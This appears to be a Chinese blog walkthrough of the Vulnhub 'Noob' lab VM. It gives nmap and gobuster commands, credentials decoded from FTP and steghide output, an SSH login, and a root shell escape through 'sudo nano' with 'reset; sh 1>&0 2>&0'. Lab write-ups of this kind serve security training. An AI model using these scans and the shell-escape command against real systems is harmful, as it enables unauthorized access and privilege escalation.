Vulnhub Noob靶机复现(附提权)

一、安装靶机

下载地址:https://download.vulnhub.com/noob/Noob.ova

下载好后使用VM打开配置如下。

二、主机发现

使用nmap扫描确认靶机ip(192.168.29.138)

复制代码
nmap -sn 192.168.29.1/24

三、端口扫描

使用nmap工具扫描全部端口以防遗漏。

复制代码
nmap -A -p- 192.168.29.138

四、目录探测

使用kali里最全的大字典去扫描。扫描出来后进行访问,查看有哪些网页目录可以利用(不要网了敏感目录)。

复制代码
gobuster dir -u http://192.168.29.138/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

五、web渗透/提权

端口扫描的时候知道我们的靶机开启了21端口ftp服务,而且里面有两个文件,下载下来看看。

cred里面的东西解码看一下是一个账号密码,应该是登录用的,welcome没啥用。

复制代码
Y2hhbXA6cGFzc3dvcmQ=

champ:password

点击About Us会下载一个压缩包,打开后就只有这些东西。图片应该还会有东西,使用工具提取一下,看看里面有什么我们没有注意到的。

bmp文件内存在隐写,查看内容。

复制代码
apt install steghide

steghide extract -sf funny.bmp
steghide info funny.jpg

cat user.txt
cat hint.py

将user.txt文件里的数据根据py文件的提示解密(rot加密)。或许是没有用到的55077端口ssh的账户密码

复制代码
wtf:this one is a simple one

还有一个55077端口的ssh服务,连接一下看看。

复制代码
ssh wtf@192.168.29.138 -p 55077

在目录下找出flag和backup文件里的另一个账户密码。

flag解码后没有啥用,切换到另一个用户里面。

查看可以使用root权限的文件

复制代码
sudo -l

执行下列命令提权

复制代码
sudo nano

Ctrl+r ,Ctrl+x

reset; sh 1>&0 2>&0

完结撒花✿✿ヽ(°▽°)ノ✿

相关推荐
NPE~1 天前
[docker/大数据]Spark快速入门
大数据·分布式·docker·spark·教程
梓贤Vigo18 天前
【Axure视频教程】动态折线图
交互·产品经理·axure·原型·教程
胡西风_foxww23 天前
Vue2 项目实现 Gzip 压缩全攻略:从配置到部署避坑指南
nginx·部署·vue2·配置·gzip·压缩·攻略
正经教主23 天前
【n8n】如何跟着AI学习n8n【03】:HTTPRequest节点、Webhook节点、SMTP节点、mysql节点
人工智能·学习·教程·工作流·n8n
哈市雪花24 天前
添加捕捉吸附标识(使用QT+OpenGL开发三维CAD)
qt·教程·opengl·cad·绘制·工业软件·捕捉吸附
正经教主25 天前
【n8n】如何跟着AI学习n8n【02.5】:第一部分总练习
人工智能·学习·教程·n8n
爱分享的飘哥25 天前
第三篇:VAE架构详解与PyTorch实现:从零构建AI的“视觉压缩引擎”
人工智能·pytorch·python·aigc·教程·生成模型·代码实战
钱彬 (Qian Bin)1 个月前
《使用Qt Quick从零构建AI螺丝瑕疵检测系统》——6. 传统算法实战:用OpenCV测量螺丝尺寸
教程·cmake·qml·qt quick·工业软件·工业瑕疵检测·qt6.9.1
NPE~1 个月前
基于MySQL实现基础图数据库
数据库·sql·mysql·教程·图数据库·图结构